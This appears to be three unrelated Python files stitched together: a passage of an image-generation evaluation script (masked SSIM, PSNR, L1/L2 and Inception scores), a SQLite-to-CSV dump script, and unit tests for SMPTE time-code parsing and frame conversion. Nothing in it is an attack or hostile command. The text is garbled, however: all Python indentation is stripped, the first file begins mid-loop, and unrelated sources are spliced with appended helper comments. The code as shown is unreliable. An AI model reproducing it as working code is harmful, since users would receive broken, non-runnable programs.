ssim_G_x.append(ssim(masked_G_array, masked_x_target_array, multichannel=True))
psnr_G_x.append(psnr(im_true=masked_x_target_array, im_test=masked_G_array))
L1_mean_G_x.append(l1_mean_dist(masked_G_array, masked_x_target_array))
L2_mean_G_x.append(l2_mean_dist(masked_G_array, masked_x_target_array))
# pdb.set_trace()
ssim_G_x_mean = np.mean(ssim_G_x)
ssim_G_x_std = np.std(ssim_G_x)
psnr_G_x_mean = np.mean(psnr_G_x)
psnr_G_x_std = np.std(psnr_G_x)
L1_G_x_mean = np.mean(L1_mean_G_x)
L1_G_x_std = np.std(L1_mean_G_x)
L2_G_x_mean = np.mean(L2_mean_G_x)
L2_G_x_std = np.std(L2_mean_G_x)
print('ssim_G_x_mean: %f\n' % ssim_G_x_mean)
print('ssim_G_x_std: %f\n' % ssim_G_x_std)
print('psnr_G_x_mean: %f\n' % psnr_G_x_mean)
print('psnr_G_x_std: %f\n' % psnr_G_x_std)
print('L1_G_x_mean: %f\n' % L1_G_x_mean)
print('L1_G_x_std: %f\n' % L1_G_x_std)
print('L2_G_x_mean: %f\n' % L2_G_x_mean)
print('L2_G_x_std: %f\n' % L2_G_x_std)
# ##################### Inception score ##################
# # IS_G_mean, IS_G_std = tflib.inception_score.get_inception_score(G_list)
# G_list_masked = [np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G_list[i]) for i in range(len(G_list))]
# IS_G_mean, IS_G_std = tflib.inception_score.get_inception_score(G_list_masked)
# print('IS_G_mean: %f\n' % IS_G_mean)
# print('IS_G_std: %f\n' % IS_G_std)
# with open(score_path, 'w') as f:
# f.write('Image number: %d\n' % N)
# f.write('ssim: %.5f +- %.5f ' % (ssim_G_x_mean, ssim_G_x_std))
# f.write('IS: %.5f +- %.5f ' % (IS_G_mean, IS_G_std))
# f.write('psnr: %.5f +- %.5f ' % (psnr_G_x_mean, psnr_G_x_std))
# f.write('L1: %.5f +- %.5f ' % (L1_G_x_mean, L1_G_x_std))
# f.write('L2: %.5f +- %.5f' % (L2_G_x_mean, L2_G_x_std))
## IS of fake data
G_list_masked = [np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G_list[i]) for i in range(len(G_list))]
IS_G_mean, IS_G_std = tflib.inception_score.get_inception_score(G_list_masked)
print('IS_G_mean: %f\n' % IS_G_mean)
print('IS_G_std: %f\n' % IS_G_std)
with open(score_path, 'w') as f:
f.write('Image number: %d\n' % N)
f.write('IS: %.5f +- %.5f ' % (IS_G_mean, IS_G_std))
## IS of real data
# x_target_list_masked = [np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*x_target_list[i]) for i in range(len(x_target_list))]
# IS_G_mean, IS_G_std = tflib.inception_score.get_inception_score(x_target_list_masked)
# print('IS_G_mean: %f\n' % IS_G_mean)
# print('IS_G_std: %f\n' % IS_G_std)
# with open(score_path+'_x_target', 'w') as f:
# f.write('Image number: %d\n' % N)
# f.write('IS: %.5f +- %.5f ' % (IS_G_mean, IS_G_std))
elif 2==stage:
test_result_dir_x = os.path.join(model_dir, test_dir, 'x_target')
test_result_dir_G1 = os.path.join(model_dir, test_dir, 'G1')
test_result_dir_G2 = os.path.join(model_dir, test_dir, 'G2')
test_result_dir_mask = os.path.join(model_dir, test_dir, 'mask')
score_path = os.path.join(model_dir, test_dir, 'score_mask.txt') #
types = ('*.jpg', '*.png') # the tuple of file types
x_files = []
G1_files = []
G2_files = []
mask_files = []
for files in types:
x_files.extend(glob.glob(os.path.join(test_result_dir_x, files)))
G1_files.extend(glob.glob(os.path.join(test_result_dir_G1, files)))
G2_files.extend(glob.glob(os.path.join(test_result_dir_G2, files)))
mask_files.extend(glob.glob(os.path.join(test_result_dir_mask, files)))
x_target_list = []
for path in x_files:
x_target_list.append(scipy.misc.imread(path))
G1_list = []
for path in G1_files:
G1_list.append(scipy.misc.imread(path))
G2_list = []
for path in G2_files:
G2_list.append(scipy.misc.imread(path))
mask_target_list = []
for path in mask_files:
mask_target_list.append(scipy.misc.imread(path))
##################### SSIM G1 ##################
N = len(x_files)
ssim_G_x = []
psnr_G_x = []
L1_mean_G_x = []
L2_mean_G_x = []
# x_0_255 = utils_wgan.unprocess_image(x_fixed, 127.5, 127.5)
# x_0_255 = x_target_list
for i in xrange(N):
# G1_gray = rgb2gray((G1_list[i]/127.5-1).clip(min=-1,max=1))
# x_target_gray = rgb2gray((x_target_list[i]/127.5-1).clip(min=-1,max=1))
# gray image, [0,1]
# G1_gray = rgb2gray((G1_list[i]).clip(min=0,max=255))
# x_target_gray = rgb2gray((x_target_list[i]).clip(min=0,max=255))
# ssim_G_x.append(ssim(G_gray, x_target_gray, data_range=x_target_gray.max()-x_target_gray.min(), multichannel=False))
# psnr_G_x.append(psnr(im_true=x_target_gray, im_test=G1_gray, data_range=x_target_gray.max()-x_target_gray.min()))
# L1_mean_G_x.append(l1_mean_dist(G1_gray, x_target_gray))
# L2_mean_G_x.append(l2_mean_dist(G1_gray, x_target_gray))
# color image
# ssim_G_x.append(ssim(G1_list[i], x_target_list[i], multichannel=True))
masked_G1_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G1_list[i])
masked_x_target_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*x_target_list[i])
ssim_G_x.append(ssim(masked_G1_array, masked_x_target_array, multichannel=True))
psnr_G_x.append(psnr(im_true=masked_x_target_array, im_test=masked_G1_array))
L1_mean_G_x.append(l1_mean_dist(masked_G1_array, masked_x_target_array))
L2_mean_G_x.append(l2_mean_dist(masked_G1_array, masked_x_target_array))
# pdb.set_trace()
ssim_G1_x_mean = np.mean(ssim_G_x)
ssim_G1_x_std = np.std(ssim_G_x)
psnr_G1_x_mean = np.mean(psnr_G_x)
psnr_G1_x_std = np.std(psnr_G_x)
L1_G1_x_mean = np.mean(L1_mean_G_x)
L1_G1_x_std = np.std(L1_mean_G_x)
L2_G1_x_mean = np.mean(L2_mean_G_x)
L2_G1_x_std = np.std(L2_mean_G_x)
print('ssim_G1_x_mean: %f\n' % ssim_G1_x_mean)
print('ssim_G1_x_std: %f\n' % ssim_G1_x_std)
print('psnr_G1_x_mean: %f\n' % psnr_G1_x_mean)
print('psnr_G1_x_std: %f\n' % psnr_G1_x_std)
print('L1_G1_x_mean: %f\n' % L1_G1_x_mean)
print('L1_G1_x_std: %f\n' % L1_G1_x_std)
print('L2_G1_x_mean: %f\n' % L2_G1_x_mean)
print('L2_G1_x_std: %f\n' % L2_G1_x_std)
##################### SSIM G2 ##################
N = len(x_files)
ssim_G_x = []
psnr_G_x = []
L1_mean_G_x = []
L2_mean_G_x = []
# x_0_255 = utils_wgan.unprocess_image(x_fixed, 127.5, 127.5)
# x_0_255 = x_target_list
for i in xrange(N):
# G2_gray = rgb2gray((G2_list[i]/127.5-1).clip(min=-1,max=1))
# x_target_gray = rgb2gray((x_target_list[i]/127.5-1).clip(min=-1,max=1))
# gray image, [0,1]
# G2_gray = rgb2gray((G2_list[i]).clip(min=0,max=255))
# x_target_gray = rgb2gray((x_target_list[i]).clip(min=0,max=255))
# ssim_G_x.append(ssim(G_gray, x_target_gray, data_range=x_target_gray.max()-x_target_gray.min(), multichannel=False))
# psnr_G_x.append(psnr(im_true=x_target_gray, im_test=G2_gray, data_range=x_target_gray.max()-x_target_gray.min()))
# L1_mean_G_x.append(l1_mean_dist(G2_gray, x_target_gray))
# L2_mean_G_x.append(l2_mean_dist(G2_gray, x_target_gray))
# color image
# ssim_G_x.append(ssim(G2_list[i], x_target_list[i], multichannel=True))
masked_G2_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G2_list[i])
masked_x_target_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*x_target_list[i])
ssim_G_x.append(ssim(masked_G2_array, masked_x_target_array, multichannel=True))
psnr_G_x.append(psnr(im_true=masked_x_target_array, im_test=masked_G2_array))
L1_mean_G_x.append(l1_mean_dist(masked_G2_array, masked_x_target_array))
L2_mean_G_x.append(l2_mean_dist(masked_G2_array, masked_x_target_array))
# pdb.set_trace()
ssim_G2_x_mean = np.mean(ssim_G_x)
ssim_G2_x_std = np.std(ssim_G_x)
psnr_G2_x_mean = np.mean(psnr_G_x)
psnr_G2_x_std = np.std(psnr_G_x)
L1_G2_x_mean = np.mean(L1_mean_G_x)
L1_G2_x_std = np.std(L1_mean_G_x)
L2_G2_x_mean = np.mean(L2_mean_G_x)
L2_G2_x_std = np.std(L2_mean_G_x)
print('ssim_G2_x_mean: %f\n' % ssim_G2_x_mean)
print('ssim_G2_x_std: %f\n' % ssim_G2_x_std)
print('psnr_G2_x_mean: %f\n' % psnr_G2_x_mean)
print('psnr_G2_x_std: %f\n' % psnr_G2_x_std)
print('L1_G2_x_mean: %f\n' % L1_G2_x_mean)
print('L1_G2_x_std: %f\n' % L1_G2_x_std)
print('L2_G2_x_mean: %f\n' % L2_G2_x_mean)
print('L2_G2_x_std: %f\n' % L2_G2_x_std)
##################### Inception score ##################
G1_list_masked = [np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G1_list[i]) for i in range(len(G1_list))]
G2_list_masked = [np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G2_list[i]) for i in range(len(G2_list))]
# IS_G1_mean, IS_G1_std = tflib.inception_score.get_inception_score(G1_list)
IS_G1_mean, IS_G1_std = tflib.inception_score.get_inception_score(G1_list_masked)
print('IS_G1_mean: %f\n' % IS_G1_mean)
print('IS_G1_std: %f\n' % IS_G1_std)
# IS_G2_mean, IS_G2_std = tflib.inception_score.get_inception_score(G2_list)
IS_G2_mean, IS_G2_std = tflib.inception_score.get_inception_score(G2_list_masked)
print('IS_G2_mean: %f\n' % IS_G2_mean)
print('IS_G2_std: %f\n' % IS_G2_std)
with open(score_path, 'w') as f:
f.write('N: %d ' % N)
f.write('ssimG1: %.5f +- %.5f ' % (ssim_G1_x_mean, ssim_G1_x_std))
f.write('ISG1: %.5f +- %.5f ' % (IS_G1_mean, IS_G1_std))
f.write('psnrG1: %.5f +- %.5f ' % (psnr_G1_x_mean, psnr_G1_x_std))
f.write('L1G1: %.5f +- %.5f ' % (L1_G1_x_mean, L1_G1_x_std))
f.write('L2G1: %.5f +- %.5f ' % (L2_G1_x_mean, L2_G1_x_std))
f.write('ssimG2: %.5f +- %.5f ' % (ssim_G2_x_mean, ssim_G2_x_std))
f.write('ISG2: %.5f +- %.5f ' % (IS_G2_mean, IS_G2_std))
f.write('psnrG2: %.5f +- %.5f ' % (psnr_G2_x_mean, psnr_G2_x_std))
f.write('L1G2: %.5f +- %.5f ' % (L1_G2_x_mean, L1_G2_x_std))
f.write('L2G2: %.5f +- %.5f' % (L2_G2_x_mean, L2_G2_x_std))
# f.write('ssim_std: %f ' % ssim_G_x_std)
# f.write('IS_mean: %f ' % IS_G_mean)
# f.write('IS_std: %f ' % IS_G_std)
# f.write('psnr_mean: %f ' % psnr_G_x_mean)
# f.write('psnr_std: %f' % psnr_G_x_std)
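# Illustrative helper (not part of the original evaluation flow): every masked
# metric above uses the same expression, np.uint8(mask/255. * image). The
# function below isolates that step so it can be checked on its own; the
# expected shapes, an (H, W) mask in [0, 255] and an (H, W, 3) image, are
# assumptions made only for this sketch.
def apply_mask(image, mask):
    import numpy as np
    # mask/255. acts as a {0, 1} weight map; uint8 matches the inputs ssim/psnr receive above
    return np.uint8(mask[:, :, np.newaxis] / 255. * image)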
|
""""
Copyright 2010 Shahriyar Amini
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sqlite3
import commands
import sys
from time import strftime
# accepts an opened sqlite connection cursor
def getTableNames(c):
tableNames = []
statement = "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name;"
c.execute(statement)
for row in c:
tableNames.append(row[0])
return tableNames
def getColumns(c, table):
columns = []
statement = "PRAGMA table_info(%s);" %table
c.execute(statement)
for row in c:
columns.append(row[1])
return columns
inputDB = sys.argv[1]
conn = sqlite3.connect(inputDB)
c = conn.cursor()
# strip a trailing '.db' extension; rstrip('.db') would strip any run of 'd', 'b', or '.' characters
dbName = inputDB[:-3] if inputDB.endswith('.db') else inputDB
ts = strftime("%m%d%Y_%H%M")
# get all the tables
tables = getTableNames(c)
for table in tables:
outputFileName = "%s_%s_%s.csv" %(dbName, table, ts)
f = open(outputFileName,'w')
# write the column header
columns = getColumns(c, table)
writeString = ''
for column in columns:
writeString = writeString + str(column) + ','
writeString = writeString.rstrip(',')
writeString = writeString + '\n'
f.write(writeString)
# get the tables entries
c.execute('select * from %s;' %table)
entryCount = 0
for row in c:
entryCount = entryCount + 1
writeString = ''
for i in range(0,len(row)):
writeString = writeString + str(row[i]) + ','
writeString = writeString.rstrip(',')
f.write(writeString + '\n')
print writeString
print 'Number of entries: ' + str(entryCount)
f.close()
c.close()
conn.close()
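# Optional sketch, not used by the script above: the manual comma-join breaks if
# a column value itself contains a comma or newline. The standard-library csv
# module handles quoting; this helper reuses getColumns and keeps the script's
# Python 2 file-mode convention ('wb'). The output path is chosen by the caller.
def dump_table_csv(cursor, table, output_path):
    import csv
    with open(output_path, 'wb') as out:
        writer = csv.writer(out)
        writer.writerow(getColumns(cursor, table))
        cursor.execute('select * from %s;' % table)
        for row in cursor:
            writer.writerow(row)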
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2020, Sandflow Consulting LLC
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit tests for the SMPTE Time Codes"""
# pylint: disable=R0201,C0115,C0116,W0212
from fractions import Fraction
import unittest
from ttconv.time_code import SmpteTimeCode, FPS_29_97, FPS_30
class SmpteTimeCodesTest(unittest.TestCase):
def test_parse_non_drop_frame_time_code(self):
time_code = SmpteTimeCode.parse("01:02:03:04", FPS_30)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_30, time_code.get_frame_rate())
self.assertFalse(time_code.is_drop_frame())
self.assertEqual(111694, time_code.to_frames())
self.assertAlmostEqual(3723.133, time_code.to_seconds(), delta=0.001)
self.assertEqual("01:02:03:04", str(time_code))
def test_parse_drop_frame_time_code(self):
time_code = SmpteTimeCode.parse("01:02:03;04", FPS_29_97)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual(Fraction(111582, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("01:02:03;04", str(time_code))
time_code = SmpteTimeCode.parse("01;02;03;04", FPS_29_97)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual(Fraction(111582, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("01:02:03;04", str(time_code))
time_code = SmpteTimeCode.parse("01:02:03;04", FPS_30)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual(Fraction(111582, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("01:02:03;04", str(time_code))
time_code = SmpteTimeCode.parse("01:02:03.04", FPS_29_97)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual(Fraction(111582, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("01:02:03;04", str(time_code))
time_code = SmpteTimeCode.parse("01.02.03.04", FPS_29_97)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual(Fraction(111582, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("01:02:03;04", str(time_code))
def test_time_code_frames_conversion(self):
time_code = SmpteTimeCode.from_frames(1795, FPS_30)
self.assertEqual("00:00:59:25", str(time_code))
self.assertEqual(1795, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1796, FPS_30)
self.assertEqual("00:00:59:26", str(time_code))
self.assertEqual(1796, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1797, FPS_30)
self.assertEqual("00:00:59:27", str(time_code))
self.assertEqual(1797, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1798, FPS_30)
self.assertEqual("00:00:59:28", str(time_code))
self.assertEqual(1798, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1799, FPS_30)
self.assertEqual("00:00:59:29", str(time_code))
self.assertEqual(1799, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1800, FPS_30)
self.assertEqual("00:01:00:00", str(time_code))
self.assertEqual(1800, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1801, FPS_30)
self.assertEqual("00:01:00:01", str(time_code))
self.assertEqual(1801, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1802, FPS_30)
self.assertEqual("00:01:00:02", str(time_code))
self.assertEqual(1802, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1803, FPS_30)
self.assertEqual("00:01:00:03", str(time_code))
self.assertEqual(1803, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1804, FPS_30)
self.assertEqual("00:01:00:04", str(time_code))
self.assertEqual(1804, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1805, FPS_30)
self.assertEqual("00:01:00:05", str(time_code))
self.assertEqual(1805, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17977, FPS_30)
self.assertEqual("00:09:59:07", str(time_code))
self.assertEqual(17977, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17978, FPS_30)
self.assertEqual("00:09:59:08", str(time_code))
self.assertEqual(17978, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17979, FPS_30)
self.assertEqual("00:09:59:09", str(time_code))
self.assertEqual(17979, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17980, FPS_30)
self.assertEqual("00:09:59:10", str(time_code))
self.assertEqual(17980, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17981, FPS_30)
self.assertEqual("00:09:59:11", str(time_code))
self.assertEqual(17981, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17982, FPS_30)
self.assertEqual("00:09:59:12", str(time_code))
self.assertEqual(17982, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17983, FPS_30)
self.assertEqual("00:09:59:13", str(time_code))
self.assertEqual(17983, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17984, FPS_30)
self.assertEqual("00:09:59:14", str(time_code))
self.assertEqual(17984, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17985, FPS_30)
self.assertEqual("00:09:59:15", str(time_code))
self.assertEqual(17985, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17986, FPS_30)
self.assertEqual("00:09:59:16", str(time_code))
self.assertEqual(17986, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17987, FPS_30)
self.assertEqual("00:09:59:17", str(time_code))
self.assertEqual(17987, time_code.to_frames())
def test_drop_frame_time_code_frames_conversion(self):
time_code = SmpteTimeCode.from_frames(1795, FPS_29_97)
self.assertEqual("00:00:59;25", str(time_code))
self.assertEqual(1795, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1796, FPS_29_97)
self.assertEqual("00:00:59;26", str(time_code))
self.assertEqual(1796, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1797, FPS_29_97)
self.assertEqual("00:00:59;27", str(time_code))
self.assertEqual(1797, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1798, FPS_29_97)
self.assertEqual("00:00:59;28", str(time_code))
self.assertEqual(1798, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1799, FPS_29_97)
self.assertEqual("00:00:59;29", str(time_code))
self.assertEqual(1799, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1800, FPS_29_97)
self.assertEqual("00:01:00;02", str(time_code))
self.assertEqual(1800, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1801, FPS_29_97)
self.assertEqual("00:01:00;03", str(time_code))
self.assertEqual(1801, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1802, FPS_29_97)
self.assertEqual("00:01:00;04", str(time_code))
self.assertEqual(1802, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1803, FPS_29_97)
self.assertEqual("00:01:00;05", str(time_code))
self.assertEqual(1803, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1804, FPS_29_97)
self.assertEqual("00:01:00;06", str(time_code))
self.assertEqual(1804, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(1805, FPS_29_97)
self.assertEqual("00:01:00;07", str(time_code))
self.assertEqual(1805, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17977, FPS_29_97)
self.assertEqual("00:09:59;25", str(time_code))
self.assertEqual(17977, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17978, FPS_29_97)
self.assertEqual("00:09:59;26", str(time_code))
self.assertEqual(17978, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17979, FPS_29_97)
self.assertEqual("00:09:59;27", str(time_code))
self.assertEqual(17979, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17980, FPS_29_97)
self.assertEqual("00:09:59;28", str(time_code))
self.assertEqual(17980, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17981, FPS_29_97)
self.assertEqual("00:09:59;29", str(time_code))
self.assertEqual(17981, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17982, FPS_29_97)
self.assertEqual("00:10:00;00", str(time_code))
self.assertEqual(17982, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17983, FPS_29_97)
self.assertEqual("00:10:00;01", str(time_code))
self.assertEqual(17983, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17984, FPS_29_97)
self.assertEqual("00:10:00;02", str(time_code))
self.assertEqual(17984, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17985, FPS_29_97)
self.assertEqual("00:10:00;03", str(time_code))
self.assertEqual(17985, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17986, FPS_29_97)
self.assertEqual("00:10:00;04", str(time_code))
self.assertEqual(17986, time_code.to_frames())
time_code = SmpteTimeCode.from_frames(17987, FPS_29_97)
self.assertEqual("00:10:00;05", str(time_code))
self.assertEqual(17987, time_code.to_frames())
def test_time_code_seconds_conversion(self):
time_code = SmpteTimeCode.from_frames(1795, FPS_30)
self.assertEqual("00:00:59:25", str(time_code))
self.assertAlmostEqual(59.833, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1796, FPS_30)
self.assertEqual("00:00:59:26", str(time_code))
self.assertAlmostEqual(59.866, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1797, FPS_30)
self.assertEqual("00:00:59:27", str(time_code))
self.assertAlmostEqual(59.9, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1798, FPS_30)
self.assertEqual("00:00:59:28", str(time_code))
self.assertAlmostEqual(59.933, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1799, FPS_30)
self.assertEqual("00:00:59:29", str(time_code))
self.assertAlmostEqual(59.966, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1800, FPS_30)
self.assertEqual("00:01:00:00", str(time_code))
self.assertAlmostEqual(60.0, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1801, FPS_30)
self.assertEqual("00:01:00:01", str(time_code))
self.assertAlmostEqual(60.033, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1802, FPS_30)
self.assertEqual("00:01:00:02", str(time_code))
self.assertAlmostEqual(60.066, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1803, FPS_30)
self.assertEqual("00:01:00:03", str(time_code))
self.assertAlmostEqual(60.1, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1804, FPS_30)
self.assertEqual("00:01:00:04", str(time_code))
self.assertAlmostEqual(60.133, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1805, FPS_30)
self.assertEqual("00:01:00:05", str(time_code))
self.assertAlmostEqual(60.166, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17977, FPS_30)
self.assertEqual("00:09:59:07", str(time_code))
self.assertAlmostEqual(599.233, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17978, FPS_30)
self.assertEqual("00:09:59:08", str(time_code))
self.assertAlmostEqual(599.266, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17979, FPS_30)
self.assertEqual("00:09:59:09", str(time_code))
self.assertAlmostEqual(599.3, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17980, FPS_30)
self.assertEqual("00:09:59:10", str(time_code))
self.assertAlmostEqual(599.333, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17981, FPS_30)
self.assertEqual("00:09:59:11", str(time_code))
self.assertAlmostEqual(599.366, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17982, FPS_30)
self.assertEqual("00:09:59:12", str(time_code))
self.assertAlmostEqual(599.4, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17983, FPS_30)
self.assertEqual("00:09:59:13", str(time_code))
self.assertAlmostEqual(599.433, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17984, FPS_30)
self.assertEqual("00:09:59:14", str(time_code))
self.assertAlmostEqual(599.466, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17985, FPS_30)
self.assertEqual("00:09:59:15", str(time_code))
self.assertAlmostEqual(599.5, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17986, FPS_30)
self.assertEqual("00:09:59:16", str(time_code))
self.assertAlmostEqual(599.533, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17987, FPS_30)
self.assertEqual("00:09:59:17", str(time_code))
self.assertAlmostEqual(599.566, time_code.to_seconds(), delta=0.001)
def test_drop_frame_time_code_seconds_conversion(self):
time_code = SmpteTimeCode.from_frames(1795, FPS_29_97)
self.assertEqual("00:00:59;25", str(time_code))
self.assertAlmostEqual(59.893, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1796, FPS_29_97)
self.assertEqual("00:00:59;26", str(time_code))
self.assertAlmostEqual(59.926, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1797, FPS_29_97)
self.assertEqual("00:00:59;27", str(time_code))
self.assertAlmostEqual(59.959, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1798, FPS_29_97)
self.assertEqual("00:00:59;28", str(time_code))
self.assertAlmostEqual(59.993, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1799, FPS_29_97)
self.assertEqual("00:00:59;29", str(time_code))
self.assertAlmostEqual(60.026, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1800, FPS_29_97)
self.assertEqual("00:01:00;02", str(time_code))
self.assertAlmostEqual(60.06, time_code.to_seconds(), delta=0.001)
